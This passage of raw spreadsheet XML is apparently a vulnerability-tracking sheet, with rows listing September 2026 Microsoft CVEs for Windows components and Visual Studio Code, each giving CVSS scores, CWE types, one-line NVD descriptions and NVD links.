s="5" t="n"><v>7.8</v></c><c r="E577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F577" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G577" s="5" t="inlineStr" /><c r="H577" s="5" t="n"><v>0.003</v></c><c r="I577" s="5" t="inlineStr" /><c r="J577" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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7" s="5" t="inlineStr" /><c r="M577" s="5" t="inlineStr" /><c r="N577" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P577" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q577" s="5" t="inlineStr" /><c r="R577" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S577" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t></is></c></row><row r="578"><c r="A578" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C578" s="5" t="inlineStr"><is><t>CVE-2026-70334</t></is></c><c r="D578" s="5" t="n"><v>7.8</v></c><c r="E578" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F578" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G578" s="5" t="inlineStr" /><c r="H578" s="5" t="n"><v>0.004</v></c><c r="I578" s="5" t="inlineStr" /><c r="J578" s="5" t="inlineStr" /><c r="K578" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L578" s="5" t="inlineStr" /><c r="M578" s="5" t="inlineStr" /><c r="N578" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P578" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q578" s="5" t="inlineStr" /><c r="R578" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S578" s="5" t="inlineStr"><is><t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t></is></c><c r="T578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t></is></c></row><row r="579"><c r="A579" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C579" s="5" t="inlineStr"><is><t>CVE-2026-70564</t></is></c><c r="D579" s="5" t="n"><v>7.8</v></c><c r="E579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F579" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G579" s="5" t="inlineStr" /><c r="H579" s="5" t="n"><v>0.003</v></c><c r="I579" s="5" t="inlineStr" /><c r="J579" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K57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9" s="5" t="inlineStr" /><c r="M579" s="5" t="inlineStr" /><c r="N579" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P579" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q579" s="5" t="inlineStr" /><c r="R579" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S579" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t></is></c></row><row r="580"><c r="A580" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C580" s="5" t="inlineStr"><is><t>CVE-2026-70569</t></is></c><c r="D580" s="5" t="n"><v>7.8</v></c><c r="E580" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F580" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G580" s="5" t="inlineStr" /><c r="H580" s="5" t="n"><v>0.003</v></c><c r="I580" s="5" t="inlineStr" /><c r="J580" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K580" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L580" s="5" t="inlineStr" /><c r="M580" s="5" t="inlineStr" /><c r="N580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P580" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q580" s="5" t="inlineStr" /><c r="R580" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S580" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t></is></c></row><row r="581"><c r="A581" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C581" s="5" t="inlineStr"><is><t>CVE-2026-70572</t></is></c><c r="D581" s="5" t="n"><v>7.8</v></c><c r="E581" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F581" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G581" s="5" t="inlineStr" /><c r="H581" s="5" t="n"><v>0.003</v></c><c r="I581" s="5" t="inlineStr" /><c r="J581" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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81" s="5" t="inlineStr" /><c r="M581" s="5" t="inlineStr" /><c r="N581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P581" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q581" s="5" t="inlineStr" /><c r="R581" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S581" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t></is></c></row><row r="582"><c r="A582" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C582" s="5" t="inlineStr"><is><t>CVE-2026-70574</t></is></c><c r="D582" s="5" t="n"><v>7.8</v></c><c r="E582" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F582" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G582" s="5" t="inlineStr" /><c r="H582" s="5" t="n"><v>0.003</v></c><c r="I582" s="5" t="inlineStr" /><c r="J582" s="5" t="inlineStr" /><c r="K582" s="5" t="inlineStr" /><c r="L582" s="5" t="inlineStr" /><c r="M582" s="5" t="inlineStr" /><c r="N582" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P582" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q582" s="5" t="inlineStr" /><c r="R582" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S582" s="5" t="inlineStr"><is><t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t></is></c></row><row r="583"><c r="A583" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C583" s="5" t="inlineStr"><is><t>CVE-2026-70581</t></is></c><c r="D583" s="5" t="n"><v>7.8</v></c><c r="E583" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F583" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G583" s="5" t="inlineStr" /><c r="H583" s="5" t="n"><v>0.003</v></c><c r="I583" s="5" t="inlineStr" /><c r="J583" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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83" s="5" t="inlineStr" /><c r="M583" s="5" t="inlineStr" /><c r="N583" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P583" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q583" s="5" t="inlineStr" /><c r="R583" s="5" t="inlineStr"><is><t>CWE-190, CWE-20</t></is></c><c r="S583" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t></is></c></row><row r="584"><c r="A584" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C584" s="5" t="inlineStr"><is><t>CVE-2026-70583</t></is></c><c r="D584" s="5" t="n"><v>7.8</v></c><c r="E584" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F584" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G584" s="5" t="inlineStr" /><c r="H584" s="5" t="n"><v>0.003</v></c><c r="I584" s="5" t="inlineStr" /><c r="J584" s="5" t="inlineStr" /><c r="K584" s="5" t="inlineStr" /><c r="L584" s="5" t="inlineStr" /><c r="M584" s="5" t="inlineStr" /><c r="N584" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P584" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q584" s="5" t="inlineStr" /><c r="R584" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S584" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t></is></c></row><row r="585"><c r="A585" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B585" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C585" s="5" t="inlineStr"><is><t>CVE-2026-70584</t></is></c><c r="D585" s="5" t="n"><v>7.8</v></c><c r="E585" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F585" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G585" s="5" t="inlineStr" /><c r="H585" s="5" t="n"><v>0.003</v></c><c r="I585" s="5" t="inlineStr" /><c r="J585" s="5" t="inlineStr" /><c r="K585" s="5" t="inlineStr" /><c r="L585" s="5" t="inlineStr" /><c r="M585" s="5" t="inlineStr" /><c r="N585" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O585" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P585" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q585" s="5" t="inlineStr" /><c r="R585" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S585" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t></is></c></row><row r="586"><c r="A586" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C586" s="5" t="inlineStr"><is><t>CVE-2026-71334</t></is></c><c r="D586" s="5" t="n"><v>7.8</v></c><c r="E586" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F586" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G586" s="5" t="inlineStr" /><c r="H586" s="5" t="n"><v>0.002</v></c><c r="I586" s="5" t="inlineStr" /><c r="J586" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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6" s="5" t="inlineStr" /><c r="M586" s="5" t="inlineStr" /><c r="N586" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O586" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P586" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q586" s="5" t="inlineStr" /><c r="R586" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S586" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t></is></c></row><row r="587"><c r="A587" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C587" s="5" t="inlineStr"><is><t>CVE-2026-71337</t></is></c><c r="D587" s="5" t="n"><v>7.8</v></c><c r="E587" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F587" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G587" s="5" t="inlineStr" /><c r="H587" s="5" t="n"><v>0.003</v></c><c r="I587" s="5" t="inlineStr" /><c r="J587" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K587" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L587" s="5" t="inlineStr" /><c r="M587" s="5" t="inlineStr" /><c r="N587" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P587" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q587" s="5" t="inlineStr" /><c r="R587" s="5" t="inlineStr"><is><t>CWE-121, CWE-130</t></is></c><c r="S587" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t></is></c></row><row r="588"><c r="A588" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C588" s="5" t="inlineStr"><is><t>CVE-2026-71343</t></is></c><c r="D588" s="5" t="n"><v>7.8</v></c><c r="E588" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F588" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G588" s="5" t="inlineStr" /><c r="H588" s="5" t="n"><v>0.003</v></c><c r="I588" s="5" t="inlineStr" /><c r="J588" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K58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8" s="5" t="inlineStr" /><c r="M588" s="5" t="inlineStr" /><c r="N588" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P588" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q588" s="5" t="inlineStr" /><c r="R588" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S588" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t></is></c><c r="T588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t></is></c></row><row r="589"><c r="A589" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C589" s="5" t="inlineStr"><is><t>CVE-2026-71345</t></is></c><c r="D589" s="5" t="n"><v>7.8</v></c><c r="E589" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F589" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G589" s="5" t="inlineStr" /><c r="H589" s="5" t="n"><v>0.003</v></c><c r="I589" s="5" t="inlineStr" /><c r="J589" s="5" t="inlineStr" /><c r="K589" s="5" t="inlineStr" /><c r="L589" s="5" t="inlineStr" /><c r="M589" s="5" t="inlineStr" /><c r="N589" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P589" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q589" s="5" t="inlineStr" /><c r="R589" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S589" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t></is></c><c r="T589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t></is></c></row><row r="590"><c r="A590" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C590" s="5" t="inlineStr"><is><t>CVE-2026-72929</t></is></c><c r="D590" s="5" t="n"><v>7.8</v></c><c r="E590" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F590" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G590" s="5" t="inlineStr" /><c r="H590" s="5" t="n"><v>0.002</v></c><c r="I590" s="5" t="inlineStr" /><c r="J590" s="5" t="inlineStr" /><c r="K590" s="5" t="inlineStr" /><c r="L590" s="5" t="inlineStr" /><c r="M590" s="5" t="inlineStr" /><c r="N590" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P590" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q590" s="5" t="inlineStr" /><c r="R590" s="5" t="inlineStr"><is><t>CWE-354</t></is></c><c r="S590" s="5" t="inlineStr"><is><t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t></is></c></row><row r="591"><c r="A591" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B591" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C591" s="5" t="inlineStr"><is><t>CVE-2026-72941</t></is></c><c r="D591" s="5" t="n"><v>7.8</v></c><c r="E591" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F591" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G591" s="5" t="inlineStr" /><c r="H591" s="5" t="n"><v>0.003</v></c><c r="I591" s="5" t="inlineStr" /><c r="J591" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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1" s="5" t="inlineStr" /><c r="M591" s="5" t="inlineStr" /><c r="N591" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O591" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P591" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q591" s="5" t="inlineStr" /><c r="R591" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S591" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t></is></c></row><row r="592"><c r="A592" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B592" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C592" s="5" t="inlineStr"><is><t>CVE-2026-72944</t></is></c><c r="D592" s="5" t="n"><v>7.8</v></c><c r="E592" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F592" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G592" s="5" t="inlineStr" /><c r="H592" s="5" t="n"><v>0.003</v></c><c r="I592" s="5" t="inlineStr" /><c r="J592" s="5" t="inlineStr" /><c r="K592" s="5" t="inlineStr" /><c r="L592" s="5" t="inlineStr" /><c r="M592" s="5" t="inlineStr" /><c r="N592" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O592" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P592" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q592" s="5" t="inlineStr" /><c r="R592" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S592" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t></is></c></row><row r="593"><c r="A593" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C593" s="5" t="inlineStr"><is><t>CVE-2026-72946</t></is></c><c r="D593" s="5" t="n"><v>7.8</v></c><c r="E593" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F593" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G593" s="5" t="inlineStr" /><c r="H593" s="5" t="n"><v>0.003</v></c><c r="I593" s="5" t="inlineStr" /><c r="J593" s="5" t="inlineStr" /><c r="K593" s="5" t="inlineStr" /><c r="L593" s="5" t="inlineStr" /><c r="M593" s="5" t="inlineStr" /><c r="N593" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P593" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q593" s="5" t="inlineStr" /><c r="R593" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S593" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t></is></c></row><row r="594"><c r="A594" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C594" s="5" t="inlineStr"><is><t>CVE-2026-72953</t></is></c><c r="D594" s="5" t="n"><v>7.8</v></c><c r="E594" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F594" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G594" s="5" t="inlineStr" /><c r="H594" s="5" t="n"><v>0.003</v></c><c r="I594" s="5" t="inlineStr" /><c r="J594" s="5" t="inlineStr" /><c r="K594" s="5" t="inlineStr" /><c r="L594" s="5" t="inlineStr" /><c r="M594" s="5" t="inlineStr" /><c r="N594" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P594" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q594" s="5" t="inlineStr" /><c r="R594" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S594" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t></is></c></row><row r="595"><c r="A595" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B595" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C595" s="5" t="inlineStr"><is><t>CVE-2026-72957</t></is></c><c r="D595" s="5" t="n"><v>7.8</v></c><c r="E595" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F595" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G595" s="5" t="inlineStr" /><c r="H595" s="5" t="n"><v>0.003</v></c><c r="I595" s="5" t="inlineStr" /><c r="J595" s="5" t="inlineStr" /><c r="K595" s="5" t="inlineStr" /><c r="L595" s="5" t="inlineStr" /><c r="M595" s="5" t="inlineStr" /><c r="N595" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P595" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q595" s="5" t="inlineStr" /><c r="R595" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S595" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t></is></c><c r="T595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t></is></c></row><row r="596"><c r="A596" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B596" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C596" s="5" t="inlineStr"><is><t>CVE-2026-72965</t></is></c><c r="D596" s="5" t="n"><v>7.8</v></c><c r="E596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F596" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G596" s="5" t="inlineStr" /><c r="H596" s="5" t="n"><v>0.003</v></c><c r="I596" s="5" t="inlineStr" /><c r="J596" s="5" t="inlineStr" /><c r="K596" s="5" t="inlineStr" /><c r="L596" s="5" t="inlineStr" /><c r="M596" s="5" t="inlineStr" /><c r="N596" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q596" s="5" t="inlineStr" /><c r="R596" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S596" s="5" t="inlineStr"><is><t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t></is></c></row><row r="597"><c r="A597" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B597" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C597" s="5" t="inlineStr"><is><t>CVE-2026-72967</t></is></c><c r="D597" s="5" t="n"><v>7.8</v></c><c r="E597" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F597" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G597" s="5" t="inlineStr" /><c r="H597" s="5" t="n"><v>0.003</v></c><c r="I597" s="5" t="inlineStr" /><c r="J597" s="5" t="inlineStr" /><c r="K597" s="5" t="inlineStr" /><c r="L597" s="5" t="inlineStr" /><c r="M597" s="5" t="inlineStr" /><c r="N597" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P597" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q597" s="5" t="inlineStr" /><c r="R597" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S597" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t></is></c></row><row r="598"><c r="A598" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C598" s="5" t="inlineStr"><is><t>CVE-2026-72988</t></is></c><c r="D598" s="5" t="n"><v>7.8</v></c><c r="E598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F598" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G598" s="5" t="inlineStr" /><c r="H598" s="5" t="n"><v>0.002</v></c><c r="I598" s="5" t="inlineStr" /><c r="J598" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K59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8" s="5" t="inlineStr" /><c r="M598" s="5" t="inlineStr" /><c r="N598" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P598" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q598" s="5" t="inlineStr" /><c r="R598" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S598" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t></is></c></row><row r="599"><c r="A599" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B599" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C599" s="5" t="inlineStr"><is><t>CVE-2026-72990</t></is></c><c r="D599" s="5" t="n"><v>7.8</v></c><c r="E599" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F599" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G599" s="5" t="inlineStr" /><c r="H599" s="5" t="n"><v>0.003</v></c><c r="I599" s="5" t="inlineStr" /><c r="J599" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K5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9" s="5" t="inlineStr" /><c r="M599" s="5" t="inlineStr" /><c r="N599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P599" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q599" s="5" t="inlineStr" /><c r="R599" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S599" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an 